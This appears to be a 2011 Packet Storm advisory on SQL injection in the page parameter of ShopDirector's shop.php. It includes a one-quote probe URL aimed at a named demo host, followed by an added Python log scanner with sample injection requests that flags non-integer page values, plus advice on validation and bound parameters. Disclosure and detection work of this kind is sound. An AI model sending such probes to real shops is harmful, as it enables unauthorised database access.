ShopDirector SQL Injection

2011-08-22T00:00:00
ID PACKETSTORM:104306
Type packetstorm
Reporter Eyup CELIK
Modified 2011-08-22T00:00:00

Description

                                        
`# Exploit Title: ShopDirector (E-Commerce System) SQL Injection  
# Date: 2011  
# Author: Eyup CELIK  
# Software Link: http://www.polyspaston.com/content_shopdirector.php  
# Version: All versions  
# Tested on: All versions are vulnerable  
  
ISSUE  
  
SQL injection is possible through user-supplied input in the page parameter of shop.php  
  
Vulnerable Page:  
shop.php  
  
Example:  
shop.php?c1=Cake&c2=Test%20cake&page=<SQL Injection Code>  
  
Exploit:  
shop.php?c1=Cake&c2=Test%20cake&page='1  
  
Demo:  
http://www.sd-demo.co.uk/shop/shop.php?c1=Cake&c2=Test%20cake&page='1  
  
  
Thanks,  
  
  
Eyup CELIK  
Information Technologies Security Specialist  
http://www.eyupcelik.com.tr  
`
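
For sites running the affected shop.php, one way to find requests matching the pattern above is to scan web server access logs for a `page` value that is not a plain integer. This Python check is an added example, not part of the original advisory or the vendor's code; the combined log format, the constructed sample lines, and the 1 to 6 digit bound on page numbers are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a combined-format access log: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation-range addresses), not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [22/Aug/2011:10:01:02 +0000] "GET /shop/shop.php?c1=Cake&c2=Test%20cake&page=2 HTTP/1.1" 200 5120
192.0.2.44 - - [22/Aug/2011:10:01:09 +0000] "GET /shop/shop.php?c1=Cake&c2=Test%20cake&page='1 HTTP/1.1" 200 312
192.0.2.44 - - [22/Aug/2011:10:01:15 +0000] "GET /shop/shop.php?c1=Cake&page=%271 HTTP/1.1" 200 312
192.0.2.10 - - [22/Aug/2011:10:02:00 +0000] "GET /shop/shop.php?c1=Cake HTTP/1.1" 200 4800
192.0.2.77 - - [22/Aug/2011:10:02:31 +0000] "GET /shop/shop.php?page=1&page=3%20x HTTP/1.1" 200 4800
192.0.2.10 - - [22/Aug/2011:10:03:00 +0000] "GET /shop/index.php?page=about HTTP/1.1" 200 900
"""


def is_valid_page(value):
    """Assumed contract: a page number is 1 to 6 ASCII digits, nothing else."""
    return re.fullmatch(r"[0-9]{1,6}", value) is not None


def suspicious_page_requests(log_text, script="shop.php"):
    """Return (client, decoded page value) for each request to `script`
    whose page parameter is not a plain integer."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/" + script):
            continue
        # parse_qs percent-decodes and keeps repeated parameters, so an
        # encoded quote (%27) and a second page= value are both examined.
        values = parse_qs(url.query, keep_blank_values=True).get("page", [])
        for value in values:
            if not is_valid_page(value):
                hits.append((line.split(" ", 1)[0], value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_page_requests(SAMPLE_LOG):
        print(f"{client}\tpage={value!r}")
```

The same integer-only rule belongs in the application's input handling, with the validated value passed to the database as a bound parameter rather than concatenated into the query.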